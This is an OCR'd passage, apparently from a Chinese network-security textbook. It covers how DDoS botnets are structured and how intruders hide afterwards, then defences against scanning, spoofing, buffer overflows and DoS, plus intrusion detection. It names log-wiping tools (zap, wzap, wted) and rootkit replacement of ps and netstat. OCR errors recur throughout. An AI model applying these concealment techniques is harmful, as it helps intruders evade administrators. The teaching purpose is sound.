响应 控制 台 的 命令 ， 一 起 向 目的 主机 以 高 速度 发 送 大量 的 数据 包 ， 导 致 它 月 省 或 者 无 法 响 
应 正常 请 求 。 

以 上 描述 的 是 分 布 式 拒绝 服务 的 一 个 典型 过 程 。 实 际 上 ， 并 非 每 一 次 攻击 都 要 遵循 这 
样 的 一 个 过 程 。 例 如 ， 攻 击 者 在 攻击 了 受害 者 A 之 后 的 某 天 打算 攻击 受害 者 B， 这 时 由 于 
攻击 者 已 经 掌握 了 控制 台 机 器 和 大 量 的 攻击 机 ， 第 二 个 过 程 就 可 以 省 略 。 或 者 ， 攻 击 者 也 
许 通过 一 些 其 他 的 渠道 对 某 个 受害 者 早已 有 了 足够 的 了 解 ， 当 他 想 要 对 其 实施 攻击 时 ， 第 
一 个 过 程 也 就 不 需要 了 。 

根据 攻击 前 期 准备 和 进行 攻击 时 采用 的 方法 、 攻 击 特性 以 及 攻击 效果 ， 可 以 对 分 布 式 
拒绝 攻击 进行 如 下 分 类 。 

根据 攻击 自动 化 的 程度 ， 可 以 分 为 手工 方式 、 半 自动 方式 和 自动 方式 。 

1) ”手工 方式 

只 有 早期 的 DDoS 攻击 属于 这 种 方式 。 攻 击 者 扫描 远程 主机 的 脆弱 点 ， 侵 入 并 安装 恶 
意 攻 击 代码 ， 然 后 指挥 倪 候 机 进行 攻击 ， 这 种 方式 很 快 就 被 半自动 方式 取代 。 

2) ”半自动 方式 

采用 半自动 的 攻击 方式 ，DDoS 网 络 中 包括 主 控 机 和 代理 机 。 攻 击 者 开发 出 自动 化 脚 
本 攻击 工具 进行 扫描 ， 利 用 漏洞 进入 代理 机 并 安装 攻击 代码 。 通 过 主 控 机 来 定义 攻击 方 
式 、 目 的 主机 地 址 ， 并 发 布 攻击 指令 。 剩 下 的 工作 ， 如 发 包 ， 就 由 代理 机 完成 了 。 

此 外 ， 根 据 代理 主机 和 主 控 机 间 的 通信 机 制 ， 可 以 把 半自动 方式 直接 通信 和 间接 
通信 。 

在 直接 通信 模式 中 ， 每 个 攻击 代理 和 主 控 机 通信 。 就 必须 知道 主 控 机 的 IP 地 址 ， 这 
通常 通过 在 攻击 代理 的 代码 中 直接 写 入 主 控 机 IP 地 址 来 实现 。 直 接 通信 模式 的 缺点 在 于 
安全 性 不 高 ， 任 意 一 个 攻击 代理 被 识破 ， 将 导致 整个 攻击 网 络 的 暴露 。 

在 间接 通信 模式 中 ， 攻 击 代理 和 主机 直接 或 不 直接 发 生 联系 ， 所 有 的 信息 交流 都 通过 
某 种 形式 的 中 间 媒 介 进 行 。 可 行 的 中 间 媒 介 包 括 : IRC 聊天 频道 、 免 费 的 Web 或 FTP 空 
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间 等 。 间 接 通 信 模 式 可 以 有 效 地 保护 整个 攻击 网 络 的 安全 。 

3) ”自动 方式 

自动 DDoS 攻击 在 攻击 阶段 也 实现 了 全 程 自动 化 ， 这 样 就 避免 了 在 攻击 者 和 代理 机 之 
间 的 通信 。 前 述 的 攻击 类 型 、 持 续 时 间 、 目 的 主机 地 址 等 信息 都 是 预先 编 入 攻击 代码 中 
的 。 显 然 ， 采 用 这 种 机 制 可 以 有 效 地 减少 攻击 者 暴露 在 外 界 的 时 间 ， 因 为 不 需要 与 外 界 打 
任何 交道 ， 而 只 发 布 初始 攻击 开始 的 命令 即 可 。 但 是 这 种 预 编码 的 方式 缺少 灵活 性 ， 使 得 
一 个 DDoS 网 络 只 能 采用 某 一 种 攻击 方式 ， 但 通常 设计 者 都 会 留 一 个 后 门 程序 来 保留 一 个 
以 后 用 来 修改 的 接口 。 

无 论 是 半自动 化 还 是 自动 化 攻击 方式 ， 都 采用 了 自动 扫描 技术 。 根 据 扫描 目标 主机 的 
策略 ， 可 以 分 为 随机 扫描 模式 、 目 的 列表 扫描 模式 、 拓 扑 结构 扫描 模式 、 队 列 扫描 模式 和 
本 地 子 网 扫描 模式 。 

随机 扫描 模式 通过 产生 一 个 32 字 节 的 随机 数 作为 扫描 目标 。 目 的 列表 扫描 模式 由 主 
控 端 负责 维护 一 个 扫描 目标 IP 地 址 列表 ， 并 分 发 部 分 PP 列表 给 每 个 入 侵 成 功 的 攻击 代理 
继续 进行 扫描 。 拓 扑 结构 扫描 模式 是 指 攻击 代理 入 侵 成 功 后 ， 搜 寻 与 该 机 有 关联 的 主机 、 
邮件 列表 等 作为 其 继续 扫描 入 侵 的 对 象 。 列 队 排 序 扫描 中 ， 所 有 的 倪 偶 主 机 都 共享 一 个 随 
机 产生 的 IP 地 址 列表 ， 目 的 主机 就 在 这 个 列表 中 选取 。 本 地 子 网 扫描 模式 以 攻击 代理 所 
在 网 段 (通常 为 c 类 子 网 ) 作 为 继续 扫描 的 对 象 。 

根据 攻击 代理 代码 传播 策略 ， 半 自动 模式 和 自动 模式 又 可 分 为 : 中 央 源 节点 传播 模 
式 、 反 向 链表 传播 模式 、 自 治 传播 模式 。 中 央 源 节点 传播 模式 是 指 每 次 入 侵 成 功 后 都 从 主 
控 端 获取 攻击 代理 代码 的 传播 模式 ， 它 增加 了 主 控 端的 数据 流量 ， 有 可 能 被 检测 出 网 络 异 
常 ， 反 向 链表 传播 模式 是 指 每 次 入 侵 成 功 后 从 其 上 一 级 攻击 代理 处 获取 攻击 代理 代码 的 传 
播 模式 ， 自 治 传播 模式 是 指 将 攻击 代理 代码 随 入 侵 代 码 一 起 直接 发 送 给 入 侵 对 象 的 传播 
模式 。 


9.4 隐藏 技术 


攻击 者 在 获得 系统 最 高 管理 员 权限 之 后 ， 可 以 随意 修改 系统 上 的 文件 。 然 而 一 旦 入 侵 
系统 ， 就 必然 会 留 下 痕迹 ， 所 以 在 入 侵 系 统 之 后 ， 攻 击 者 大 多 都 会 采取 隐藏 技术 来 消 隐 自 
己 的 攻击 行为 ， 为 创建 后 门 做 准备 。 


1. 隐藏 连接 


最 简单 的 隐藏 连接 的 方法 是 删除 或 修改 日 志文 件 。 删 除 日 志文 件 虽 然 可 避免 系统 管理 
员 根 据 卫 追踪 ， 但 会 明确 表明 系统 已 经 被 入 侵 ， 所 以 常用 的 方法 是 只 对 日 志文 件 中 有 关 
部 分 做 修改 。 修 改 日 志文 件 的 方法 根据 不 同 的 操作 系统 有 所 区 别 ， 常 用 的 清除 日 志 工 具 程 
序 有 zap、wzap 和 wted 等 。 主 要 方法 是 清除 utmp、wtmp、lastlog 和 pacct 等 日 志文 件 中 
某 一 用 户 的 信息 ， 使 得 当 使 用 who、last 等 命令 查看 日 志文 件 时 ， 隐 藏 此 用 户 信息 。 


2. 隐藏 进程 
只 修改 日 志文 件 是 不 够 的 ， 即 使 自 认 为 修改 了 所 有 的 日 志 ， 也 仍然 会 留 下 蛛丝马迹 。 
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例如 ， 安 装 某 些 后 门 程序 后 ， 运 行 时 就 有 可 能 被 管理 员 发 现 。 所 以 高 水 平 的 黑客 常 通过 蔡 
换 一 些 系 统 程序 的 方法 来 进一步 隐藏 踪迹 。 用 来 蔡 换 正 常 系统 程序 的 工具 程序 比较 常见 的 
有 Linux Rootkit， 可 以 替换 系统 的 ls、ps、netstat、inetd 等 一 系列 重要 的 系统 程序 。 例 
如 ， 用 木马 代替 ps 程序 等 。 


3. 隐蔽 文件 


隐蔽 文件 简单 地 说 就 是 利用 某 些 字符 串 的 相似 性 来 麻痹 系统 管理 员 ， 或 修改 文件 属性 
使 得 用 普通 显示 方法 无 法 看 到 ， 也 可 以 利用 操作 系统 可 加 载 模块 特性 ， 来 隐藏 攻击 时 产生 
的 信息 。 


9.5 网 络 攻击 的 防御 技术 


9.5.1 ”有效 预防 端口 扫描 


因为 攻击 者 都 是 先 扫描 开放 端口 ， 然 后 利用 这 些 开放 端口 进行 攻击 ， 所 以 有 必要 对 自 
己 的 计算 机 中 的 开放 端口 做 到 心中 有 数 ， 发 现 可 疑 端口 应 立即 关闭 ， 以 防 攻击 者 攻击 。 有 
效 预防 端口 扫描 的 方法 有 关闭 闲置 和 有 潜在 危险 的 端口 与 检查 各 端口 并 屏蔽 可 疑 端口 
两 种 。 


1. 关闭 闲置 和 有 潜在 危险 的 端口 


该 办 法 是 将 所 有 用 户 需 要 用 到 的 正常 计算 机 端口 外 的 其 他 端口 都 关闭 掉 。 因 为 就 攻击 
者 而 言 ， 所 有 的 端口 都 可 能 成 为 攻击 的 目标 。 换 句 话 说 ， 计 算 机 中 所 有 对 外 通信 的 端口 都 
有 潜在 的 危险 ， 而 一 些 系 统 必要 的 通信 端口 ， 如 访问 网 页 需要 的 HTTP(80 端口 )、 
QQ(4000 端口 ) 等 不 能 被 关 掉 。 

在 Windows 系统 中 可 以 采用 定向 关闭 制定 服务 的 端口 和 只 开放 允许 端口 的 方式 进行 
端口 管理 。 


2. 检查 各 端口 并 屏蔽 可 疑 端口 


这 种 预 设 端口 扫描 的 方式 只 能 借助 于 网 络 防火 墙 软件 。 防 火 墙 的 工作 原理 是 ， 首 先 检 
查 每 个 到 达 本 地 计算 机 的 数据 包 ， 当 第 一 个 请 求 建立 连接 的 数据 包 被 计算 机 回应 后 ， 一 个 
TCP/IP 端口 被 打开 ; 端口 扫描 时 ， 对 方 计算 机 不 断 和 本 地 计算 机 建立 连接 ， 并 逐渐 打开 
各 个 服务 所 对 应 的 TCP/IP 端口 及 闲置 端口 ， 防 火 墙根 据 自 带 的 拦截 规则 判断 ， 能 够 知道 
对 方 是 否 正 进 行 端口 扫描 ， 并 拦截 对 方 发 送 过 来 的 所 有 扫描 需要 的 数据 包 。 

现在 市 面 上 几乎 所 有 网 络 防火 墙 都 能 够 抵御 端口 扫描 ， 默 认 安装 后 ， 应 该 检查 一 些 防 
火 墙 所 有 的 端口 扫描 规则 是 否 被 选中 ， 未 选中 的 话 防火 墙 会 放行 端口 扫描 ， 而 只 在 日 志 中 
留 下 信息 。 


9.5.2 口令 攻击 的 防范 
攻击 者 在 攻击 目标 时 ， 常 常 把 破译 普通 用 户 的 口令 作为 攻击 的 开始 。 它 们 总 是 千 方 百 
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计 地 想 办 法 ， 通 过 形形色色 的 口令 攻击 方式 来 获取 口令 。 一 旦 获得 了 口令 ， 得 到 一 定 的 权 
限 ， 就 可 以 对 用 户 的 电脑 为 所 欲 为 了 。 面 对 这 种 口令 攻击 ， 用 户 应 该 掌握 一 些 防范 口令 攻 
击 的 方法 。 

防范 口令 攻击 的 最 重要 的 一 点 就 是 不 能 留 下 空 口 令 ， 也 就 是 说 不 能 因为 一 时 方便 而 不 
设置 密码 。 但 就 算 设置 了 密码 ， 也 不 能 粗心 大 意 ， 以 为 万 事 大 吉 了 。 在 设置 密码 时 ， 应 避 
免 设 置 弱 口 令 ， 而 应 该 采取 那些 不 易 被 攻击 的 强 口令 。 也 就 是 说 设置 的 密码 不 能 太 短 ， 因 
为 Windows XP 和 Windows Server 2003 支持 28 个 字符 的 密码 。 同 时 ， 不 能 是 别人 很 容易 
就 能 猜测 出 来 的 密码 ， 如 : 自己 或 亲友 的 电话 号 码 、 生 日 、 特 殊 的 纪念 日 等 一 些 信 息 。 设 
置 的 口令 最 好 采用 字母 、 数 字 ， 还 有 标点 符号 、 特 殊 字符 的 组 合 ， 同 时 有 大 小 写字 母 ， 长 
度 最 好 到 达 8 个 以 上 ， 最 好 容易 记忆 ， 不 必 把 口令 写 下 来 。 


9.5.3 ”恶意 代码 攻击 的 防范 

要 禁止 恶意 代码 的 运行 ， 从 而 避免 恶意 网 页 的 攻击 ， 可 以 采取 一 些 有 效 的 措施 进行 防 
护 。 用 户 首先 要 做 好 IE 的 安全 设置 ， 下 面 介绍 几 种 可 以 有 效 地 防止 恶意 代码 攻击 的 
方法 。 

1. 设置 IE 安全 级 别 


具体 的 操作 过 程 如 下 。 

(1) 打开 正 浏览 器 ， 选 择 “ 工 具 ” 一 “Intemet 选项 ”命令 ， 打 开 “Internet 选项 ” 
对 话 框 。 切 换 到 “安全 ”选项 卡 ， 单 击 其 中 的 “ 自 定 义 级 别 ” 按 钮 。 

(2) 打开 “安全 设置 ”对 话 框 ， 在 下 方 的 “ 重 置 为 ”下 拉 列 表 框 中 选择 “安全 级 - 
高 ”选项 ， 将 安全 级 别 由 “中 ” 改 为 “高 ”。 


2. 禁用 ActiveX 控件 与 相关 选项 


ActiveX 控件 和 Applets 有 较 强 的 功能 ， 但 也 存在 被 恶意 程序 利用 的 隐患 ， 网 页 中 的 
恶意 代码 往往 就 是 利用 这 些 控件 编写 的 小 程序 ， 只 要 打开 网 页 就 会 被 运行 。 所 以 要 避免 恶 
意 网 页 的 攻击 ， 就 要 禁止 这 些 恶 意 代码 的 运行 。 禁 止 ActiveX 控件 与 相关 选项 的 具体 方法 
如 下 : 打开 “Intemet 选项 ”对 话 框 ， 切 换 到 “安全 ”选项 卡 ， 单 击 其 中 的 “ 自 定 义 级 
别 ” 按 钮 ， 即 可 打开 “安全 设置 ”对 话 框 ， 在 “设置 ”列表 框 中 建议 用 户 将 ActiveX 控件 
与 相关 选项 都 设置 为 禁用 ， 就 可 以 避免 受到 恶意 代码 的 网 页 的 攻击 。 

3. 禁止 访问 某 些 站 点 

网 络 上 有 很 多 站 点 都 带 有 恶意 代码 ， 容 易 使 浏览 者 中 招 。 如 果 用 户 知道 哪些 站 点 存在 
恶意 代码 ， 可 以 在 正 中 做 一 些 设置 ， 以 便 以 后 永远 不 进 该 站 点 ， 有 具体 的 操作 步骤 如 下 。 

(1) 打开 “Internet 选项 ”对 话 框 ， 切 换 到 “内 容 ” 选 项 卡 。 单 击 “ 分 级 审查 ”区 域 
中 的 “启用 ”按钮 。 

(2) 打开 “内 容 审查 程序 ”对 话 框 ， 切 换 到 “许可 站 点 ”选项 卡 ， 在 “人 允许 该 网 站 ” 
文本 框 中 输入 不 想 访问 的 网 站 网 址 ， 单 击 “ 从 不 ”按钮 。 

(3) 在 设置 完成 后 ， 单 击 “确定 ”按钮 ， 则 用 户 以 后 都 不 会 进入 该 站 点 中 。 
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4. 禁止 使 用 注册 表 


为 了 避免 一 些 不 怀 好 意 的 黑客 利用 注册 表 更 改 里 面 某 些 项 的 值 ， 可 以 为 注册 表 “ 加 
锁 ”。 
方法 是 在 注册 表 中 依次 选择 HKEY _ CURRENT USER\Software\MicrosoftWindows\ 
CurrentVersion\Policies\System 选项 并 右 击 ， 在 弹出 的 快捷 菜单 中 选择 “新 建 ” 一 
“DWORD 值 ” 命 令 ， 即 可 新 建 一 个 DWORD 值 项 。 
将 新 建 的 DWORD 值 项 重 命名 为 “DisableRegistryTools”， 并 双击 该 项 ， 将 其 值 更 改 
为 “1”， 即 可 禁止 使 用 注册 表 编 辑 器 。 


9.5.4 预防 IP 欺骗 的 方法 


通过 本 地 网 络 、 防 火 墙 以 及 入 侵 检测 系统 (9.3 节 详 细 介 绍 ) 进 行 适当 的 设计 和 配置 ， 
就 能 阻止 或 检测 出 相应 的 攻击 行为 ， 具 体 措 施 如 下 。 

(1) 抛弃 基于 地 址 的 信任 策略 。 阻 止 这 类 攻击 的 一 种 非常 简单 的 办 法 就 是 放弃 以 地 址 
为 基础 的 验证 。 

(2) 进行 包 过 滤 。 如 果 网 络 是 通过 路 由 器 接 入 Internet 的 ， 可 利用 路 由 器 来 进行 包 过 
滤 。 确 信 只 有 内 部 子 网 可 以 使 用 信任 关系 ， 而 对 于 子 网 以 外 的 主机 要 慎重 处 理 。 路 由 器 可 
以 帮助 过 滤 掉 所 有 来 自 于 外 部 网 络 而 希望 与 内 部 网 络 建立 连接 的 请 求 。 

(3) 使 用 加 密 方法 。 阻 止 IP 欺骗 的 另 一 种 方法 是 在 通信 时 要 求 加 密 传输 和 验证 。 当 
有 多 种 手段 并 存 时 ， 可 能 加 密 方法 最 为 适用 。 

(4) 使 用 随机 的 初始 序列 号 。 黑 客 攻 击 得 以 成 功 的 一 个 很 重要 的 因素 就 是 ， 序 列 号 不 
是 选择 或 随机 增加 的 。 

(5) 监控 网 络 上 的 数据 包 。 通 过 对 网 络 上 的 数据 包 进行 监控 ， 及 时 发 现 IP 欺骗 攻击 
的 前 兆 。 

(6) 对 照 检查 本 地 主机 之 间 的 日 志 是 否 对 应 。 由 于 大 部 分 卫 欺骗 攻击 是 由 攻击 主机 
来 模拟 信任 主机 的 ， 所 以 通过 在 相互 设置 信任 关系 的 主机 之 间 对 照 检查 日 志 就 可 以 检测 
TCP 连接 是 否 被 伪造 。 


9.5.5 ”预防 ARP 欺骗 攻击 


预防 ARP 欺骗 攻击 ， 具 体内 容 如 下 。 

(1) 停止 使 用 地 址 动态 绑 定 和 ARP 高 速 缓存 定期 更 新 的 策略 ， 在 ARP 高 速 缓存 中 保 
存 永久 的 人 地 址 与 硬件 地 址 映射 表 ， 人 允许 由 系统 管理 人 员 进 行人 工 修改 。 该 方法 主要 应 
用 于 对 安全 性 要 求 较 高 且 较 小 的 局 域 网 ， 其 操作 依靠 人 工 ， 且 工作 量 大 。 

(2) 在 路 由 器 的 ARP 高 速 缓存 中 放置 所 有 所 受信 任 主机 的 永久 条 目 ， 也 可 以 减少 并 
防止 ARP 欺骗 ， 但 路 由 器 在 寻 径 中 同样 存在 安全 漏洞 。 

(3) 使 用 ARP 服务器。 通过 该 服务 器 查找 自己 的 ARP 转换 表 来 响应 其 他 机 器 的 ARP 
广播 。 确 保 这 台 ARP 服务 器 不 被 黑 。 
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9.5.6 ”RIP 路 由 欺骗 的 防范 


防御 措施 主要 有 : 路 由 器 在 接受 新 路 由 前 应 先 验 证 其 是 否 可 达 ， 这 可 以 大 大 降低 受 此 
类 攻击 的 概率 。 但 是 RIP 的 有 些 实现 并 不 进行 验证 ， 使 一 些 假 路 由 信息 也 能 够 广泛 流传 。 
由 于 路 由 信息 在 网 上 可 见 ， 随 着 假 路 由 信息 在 网 上 的 传播 范围 扩大 ， 它 被 发 现 的 可 能 性 也 
在 增 大 。 所 以 ， 对 于 系统 管理 员 而 言 ， 经 常 检查 日 志文 件 会 有 助 于 发 现 此 类 问题 。 


9.5.7 防范 DNS 欺骗 


为 了 保护 DNS 服务 器 不 受 攻击 ， 用 户 应 采取 以 下 防护 措施 。 

(1) 使 用 较 新 的 DNS 软件 ， 因 为 它们 中 有 些 可 以 支持 控制 访问 方式 记录 DNS 信息 ， 
域名 解析 服务 器 只 对 那些 合法 的 请 求 做 出 响应 。 内 部 的 请 求 可 以 不 受 限 制 地 区 访问 区 域 信 
息 ， 外 部 的 请 求 仅 能 访问 那些 公开 的 信息 。 

(2) 正确 配置 区 域 传输 。 即 只 允许 相互 信任 的 DNS 服务 器 之 间 传 输 解析 数据 。 

(3) 直接 用 人 访问 重要 的 服务 ， 这 样 至 少 可 以 避 开 DNS 欺骗 攻击 。 但 需要 记 住 自己 
要 访问 的 卫 地 址 。 

(4) 保护 DNS 服务 器 所 存储 的 信息 。 部 分 注册 信息 的 登录 方式 仍然 采用 一 些 比较 过 
时 的 方法 ， 如 采用 电子 邮件 的 方式 就 可 以 升级 DNS 注册 信息 ， 这 些 过 时 的 方法 需要 添加 
安全 措施 ， 例 如 采用 加 密 的 口令 ， 或 者 采用 安全 的 浏览 器 平台 工具 来 提供 管理 域 代 码 记录 
的 方式 。 

(5) 配合 使 用 防火 墙 。 使 用 防火 墙 可 使 得 DNS 服务 器 位 于 防火 墙 的 保护 之 内 ， 只 开 
放 响 应 的 服务 器 端口 和 协议 。 

(6) 系统 管理 员 也 可 以 采用 分 离 DNS 的 方式 ， 内 部 的 系统 与 外 部 系统 分 部 访问 不 同 
的 DNS 系统 ， 外 部 的 计算 机 仅 能 访问 公共 的 记录 。 


9.5.8 缓冲 区 溢出 的 攻击 防范 


缓冲 区 溢出 的 攻击 防范 ， 具 体内 容 如 下 。 

1) ”编写 正确 的 代码 

编写 正确 的 代码 很 有 意义 但 也 很 耗 时 ， 特 别 在 编写 C 语言 程序 时 ， 由 于 追求 性 能 而 
忽视 正确 性 会 引起 一 些 错误 。 因此， 开发 了 一 些 工具 和 技术 来 帮助 经 验 不 足 的 程序 员 编 写 
出 正确 的 程序 。 最 简单 的 方法 就 是 用 grep 来 搜索 资源 代码 中 容易 产生 漏洞 的 库 的 调用 ， 
例如 ， 对 strcpy0 和 sprintf0 的 调用 。 虽 然 这 些 工 具 能 够 帮助 程序 员 开 发 更 安全 的 程序 ， 但 
它们 只 能 用 来 减少 缓冲 区 溢出 的 可 能 性 而 不 可 能 找 出 所 有 的 缓冲 区 溢出 漏洞 。 

2)” 非 执行 的 缓冲 区 

通过 使 被 攻击 程序 的 数据 段 地 址 空间 不 可 执行 ， 从 而 使 得 系统 不 可 能 执行 植 入 被 攻击 
程序 输入 缓冲 区 的 代码 ， 这 种 技术 称 为 非 执行 的 缓冲 区 技术 。 

3) “数组 边界 检查 

缓冲 区 溢出 的 根本 原因 是 没有 进行 数组 边界 检查 。 当 数组 溢出 时 ， 一 些 关键 的 数据 就 
有 可 能 被 修改 ， 如 函数 返回 地 址 、 过 程 帧 指针 、 函 数 指针 等 。 同 时 ， 攻 击 代码 也 可 能 被 植 
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入 。 为 了 实现 数组 边界 检查 ， 所 有 对 数组 的 读 写 操作 都 应 当 检查 ， 以 确保 对 数组 的 操作 在 
正确 的 范围 内 。 最 直接 的 方法 是 检查 所 有 的 数组 操作 。 

4) “程序 指针 完整 性 检查 

程序 指针 完整 性 检查 的 原理 是 在 每 次 程序 指针 被 引用 之 前 ， 先 检查 该 指针 是 否 已 被 亚 
意 改动 过 ， 如 果 发 现 被 改动 ， 程 序 就 拒绝 执行 。 

与 数组 边界 检查 相 比 ， 这 种 方法 在 性 能 上 有 很 大 的 优势 ， 而 且 兼容 性 很 好 。 


9.5.9 对 拒绝 服务 攻击 的 防范 


对 拒绝 服务 攻击 的 防范 ， 具 体内 容 如 下 。 

(1) 确保 所 有 服务 器 采用 最 新 系统 ， 并 打上 安全 补丁 。 计 算 机 紧急 响应 协调 中 心 发 
现 ， 几 乎 每 个 受到 DoS 攻击 的 系统 都 没有 及 时 打上 补丁 。 对 一 些 重要 的 信息 (例如 系统 配 
置信 息 ) 应 建立 和 完善 备份 机 制 ， 对 一 些 特权 账号 (例如 管理 员 账 号 ) 的 密码 设置 要 慎重 。 通 
过 这 样 一 系列 的 举措 可 以 把 攻击 者 的 可 乘 之 机 降低 到 最 小 。 

(2) 删除 多 余 的 网 络 服务 。 在 网 络 管理 方面 ， 要 经 常 检查 系统 的 物理 环境 ， 禁 止 那些 
不 必要 的 网 络 服务 ， 建 立 边界 安全 界限 ， 确 保 输出 的 包 收 到 正确 限制 ， 经 常 检测 系统 配置 
信息 ， 并 注意 查看 每 天 的 安全 日 志 ; 如 果 是 一 个 单机 用 户 ， 可 去 掉 多 余 的 网 络 协议 ， 完 全 
禁止 NetBIOS 服务 ， 从 而 堵 上 这 个 危险 的 “漏洞 ”。 

(3) 自己 定制 的 防火 墙 规则 ， 利 用 网 络 安全 设备 (如 硬件 防火 墙 ) 来 加 固 网 络 的 安全 
性 ， 配 置 好 这 些 设备 的 安全 规则 ， 过 滤 掉 所 有 可 能 的 伪造 数据 包 。 

(4) 确保 从 服务 器 相应 的 目录 或 文件 数据 库 中 删除 未 使 用 的 服务 ， 如 FTP、NTS、 
Wu-Ftpd 等 守护 程序 存在 一 些 已 知 的 漏洞 ， 黑 客 通过 漏洞 攻击 就 能 获得 访问 特权 系统 的 权 
限 ， 并 能 访问 其 他 系统 。 

(5) 禁止 内 部 网 通过 Modem 连接 至 PSTN 系统 ， 和 否则 ， 攻 击 者 能 通过 电话 线 发 现 未 
受 保护 的 主机 ， 即 刻 就 能 访问 极为 机 密 的 数据 。 

(6) 禁止 使 用 网 络 访问 某 些 程序 ， 如 Telnet、Ftp、Rsh、Rlogin 和 Rcp， 而 以 基于 
PKI 的 访问 程序 (如 SSH) 取 代 。SSH 不 会 在 网 上 以 明文 格式 传送 口令 ， 而 Telnet 和 Rlogin 
则 正好 相反 ， 攻 击 者 能 搜寻 到 这 些 口 令 ， 从 而 立即 访问 网 络 上 的 重要 服务 器 。 

(7) 限制 在 防火 墙 外 与 网 络 文件 共享 。 这 可 以 防止 黑客 有 机 会 截获 系统 文件 ， 并 以 特 
洛 伊 木 马 替 换 它 ， 从 而 避免 文件 的 传输 功能 陷入 瘫痪 。 

(8) 在 防火 墙 外 运行 端口 映射 程序 或 端口 扫描 程序 。 大 多 数 事件 是 由 于 防火 墙 配置 不 
当 造 成 的 ， 使 DoS/DDoS 攻击 的 成 功率 很 高 ， 所 以 一 定 要 认真 检查 特权 端口 和 非特 权 
端口 。 

(9) 检查 所 有 网 络 设备 和 主机 /服务 器 系统 的 日 志 。 如 果 日 志 出 现 漏洞 或 时 间 出 现 变 
更 ， 则 很 可 能 相关 的 主机 安全 受到 了 威胁 。 

(10) 确保 管理 员 对 所 有 主机 进行 检查 ， 而 不 仅 针对 关键 主机 ， 这 是 为 了 确保 管理 员 知 
道 每 个 主机 系统 在 干什么 、 谁 在 使 用 主机 、 哪 些 人 可 以 访问 主机 ， 不 然 ， 即 使 攻击 者 侵犯 
了 系统 ， 也 很 难 查 明 。 
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9.6 入 侵 检 测 


9.6.1 入 侵 检 测 的 基本 概念 


在 1980 年 James Anderson 首次 给 出 了 入 侵 的 定义 : 入 侵 是 指 在 非 授权 的 情况 下 ， 试 
图 存 取信 息 、 处 理 信息 或 破坏 系统 以 使 系统 不 可 靠 、 不 可 用 的 故意 行为 。 入 侵 检测 是 通过 
从 计算 机 网 络 系统 中 的 若干 关键 点 收集 信息 并 对 其 进行 分 析 ， 从 中 发 现 违反 安全 策略 的 行 
为 和 遭 到 攻击 的 迹象 ， 并 做 出 自动 的 响应 。 目 前 得 到 广泛 认同 的 通用 模型 是 公共 入 侵 检测 
框架 (Common Intrusion Detection Framework， 简 称 CIDF)， 一 般 的 入 侵 检 测 系统 包括 信息 
收集 、 信 息 分 析 、 信 息 存储 、 攻 击 响应 几 部 分 。 

防火 墙 是 要 保护 的 网 络 或 系统 与 外 界 之 间 的 一 道 安 全 屏障 。 它 通过 加 强 网 络 间 的 访问 
控制 ， 防 止 外 部 用 户 非法 使 用 内 部 网 的 资源 ， 从 而 达到 保护 内 部 网 络 的 设备 不 被 破坏 ， 防 
止 内 部 网 络 的 敏感 数据 被 窃取 的 目的 。 它 规定 了 哪些 内 部 服务 可 以 被 外 界 访问 ， 外 界 的 哪 
些 人 可 以 访问 内 部 的 服务 ， 以 及 哪些 外 部 服务 可 以 被 内 部 人 员 访 问 。 

但 防火 墙 只 是 一 种 被 动 的 防御 技术 ， 它 无 法 识别 和 防御 来 自 内 部 网 络 的 滥用 和 攻击 ， 
比如 内 部 员工 恶意 破坏 、 删 除数 据 ， 越 权 使 用 设备 ， 也 不 能 有 效 防止 绕 过 防火 墙 的 攻击 ， 
比如 公司 的 员工 将 机 密 数 据 用 便携 式 存储 设备 随身 带 出 去 造成 泄密 ， 员 工 自己 拨号 上 网 造 
成 攻击 进入 等 。 

入 侵 检测 技术 作为 一 种 主动 防护 技术 ， 可 以 在 攻击 发 生 时 记录 攻击 者 的 行为 ， 发 出 报 
警 ， 必 要 时 还 可 以 追踪 攻击 者 。 它 既 可 以 独立 运行 ， 也 可 以 与 防火 墙 等 安全 技术 协同 工 
作 ， 更 好 地 保护 网 络 。 

入 侵 检测 技术 是 继 “防火 墙 ”、“ 数 据 加 密 ” 等 传统 安全 保护 措施 之 后 的 新 一 代 安全 
保障 技术 ， 它 作为 防火 墙 之 后 的 第 二 道 安全 屏障 ， 致 力 于 实时 的 入 侵 检测 ， 企 图 尽早 发 现 
入 侵 以 及 入 侵 企图 ， 并 采取 记录 、 报 警 、 隔 断 等 有 效 措 施 来 堵塞 漏洞 和 修复 系统 。 按 照 原 
始 数据 的 来 源 ， 可 将 入 侵 检 测 系统 分 为 基于 主机 的 入 侵 检测 系统 和 基于 网 络 的 入 侵 检测 系 
统 。 按 照 体系 结构 ，IDS 可 分 为 集中 式 、 等 级 式 和 协作 式 三 种 。 根 据 分 析 引 擎 所 采用 的 技 
术 ， 入 侵 检 测 可 以 分 为 异常 检测 技术 和 误 用 检测 技术 两 大 类 。 


1. 异常 检测 技术 


异常 检测 假定 所 有 的 用 户 行为 都 有 异常 特性 。 它 依据 系统 或 用 户 的 行为 和 使 用 计算 机 
资源 的 情况 是 否 符合 正常 行为 模式 来 检测 入 侵 行为 。 异 常 检 测 需 要 建立 用 户 的 正常 行为 模 
式 ， 然 后 将 实际 用 户 行为 和 这 些 行为 模式 相 比 较 ， 比 较 二 者 的 差异 是 否 超 过 预定 的 临界 值 
来 判定 用 户 和 计算 机 的 行为 是 否 属于 入 侵 行为 。 异 常 检测 技术 的 优点 在 于 可 以 实现 对 未 知 
入 侵 行 为 的 预报 能 力 ， 但 它 存 在 较 高 的 误 报 率 ， 如 图 9-12 所 示 。 


2. 误 用 检测 技术 


通过 攻击 模式 、 攻 击 签名 的 形式 表达 入 侵 行为 。 该 系统 对 已 知 的 入 侵 行 为 进行 分 析 ， 
提取 入 侵 的 特征 ， 构 建 攻击 模式 或 攻击 签名 ， 通 过 系统 当前 状态 与 攻击 模式 或 攻击 签名 的 
匹配 ， 判 断 是 否 为 入 侵 行为 。 误 用 检测 技术 的 优点 在 于 准确 地 检测 已 知 的 入 侵 行 为 ， 但 它 
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不 能 检测 未 知 的 入 侵 行 为 ， 如 图 9-13 所 示 。 


图 9-13 误 用 检测 模型 


3. 协议 分 析 技 术 

协议 分 析 的 功能 是 辨别 数据 包 的 协议 类 型 ， 以 便 使 用 相应 的 数据 分 析 程 序 来 检测 数据 
包 。 把 所 有 的 协议 构成 一 棵 协议 树 ， 如 可 以 用 一 棵 二 叉 树 来 表示 ， 如 图 9-14 所 示 。 树 中 
的 每 个 节点 对 应 一 个 特定 的 协议 。 一 个 网 络 数据 包 的 分 析 就 是 一 条 从 根 到 某 个 叶 节点 的 路 
